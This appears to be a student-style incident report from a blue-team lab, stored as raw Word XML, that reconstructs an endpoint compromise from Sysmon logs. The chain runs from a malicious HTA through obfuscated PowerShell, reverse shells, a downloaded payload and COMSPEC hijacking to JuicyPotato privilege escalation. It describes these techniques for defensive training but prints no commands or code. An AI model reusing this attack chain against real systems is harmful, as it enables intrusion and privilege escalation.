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Multi-Stage Malware Intrusion Investigation Using Sysmon Logs</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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Idris Ibrahim Adetola</w:t>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Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11-02-2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Source: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BTLO Labs.</w:t>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08">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective of this investigation was to analyze a JSON Sysmon log file from a compromised endpoint without the use of a SIEM to identify the steps and techniques used by the attacker.</w:t>
      </w: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Incident Classification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Type: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Stage Malware Infection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity Level: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System-Level Privilege Escalation Achieved</w:t>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Tools and Data Sources</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notepad ++ : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Text and source code editor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Source: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue Team Lab Online (BTLO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virus Total</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Investigation Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The analyzed log contains windows sysmon events of a compromised endpoint. Observed parameters are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 1 - Process creations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 3 - Network connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 11 - File Creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command line and powershell executions.</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The Investigation focused on identifying the steps and techniques used by the attacker to compromise the endpoint, from the entry point and payload delivery to persistence and the attacker’s actions on objectives.</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigation Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Events Identification</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The investigation started by filtering the important event IDs to create a baseline for the investigation. The primary observed events included:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID 15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Creation Events Analysis</w:t>
      </w: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Process creation events were filtered and analyzed to detect suspicious executions and to identify malicious parent-child process relationships. Multiple suspicious processes including  PowerShell executions were observed. ProcessGuid and parentProcessGuid were utilized to reconstruct the execution chain and determine process relationships.</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Creation and Network Connection Review</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File creations and network connections events were reviewed and suspicious file downloads were identified and communications with external IP addresses were detected. </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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence Enrichment</w:t>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Observed File hashes and  IP addresses were enriched with open source threat intelligence sources, and several indicators  were confirmed to be malicious. </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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Timelines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs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Time(UTC)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Updater.hta Downloaded from chrome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Mshta.exe executed malicious HTA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Obfuscated Powershell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Reverse shell established (Port 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Supply.exe downloaded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12:21:43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Environment COMSPEC modified to Supply.exe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12:22:41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ftp.exe executed supply.exe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12:28:57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JuicyPotato.exe downloaded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12:31:24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JuicyPotato.exe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12:31:24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SYSTEM revershell established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical FIndings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack chain was reconstructed from the entry point to the action on objectives. The chronological attack chain is : </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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A malicious HTA file was downloaded from the chrome browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mshta.exe executed the HTA file, thereby launching the attack.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution and Defence Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The execution triggered an obfuscated PowerShell script block, likely to evade detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PowerShell process(PID) initiated an outbound connection on port 1234, indicating a probable reverse shell</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload delivery(Stage 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the shell, the attacker executed Invoke-WebRequest to download supply.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After the download, another outbound connection to the same IP on port 6969 was observed.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b w:val="1"/>
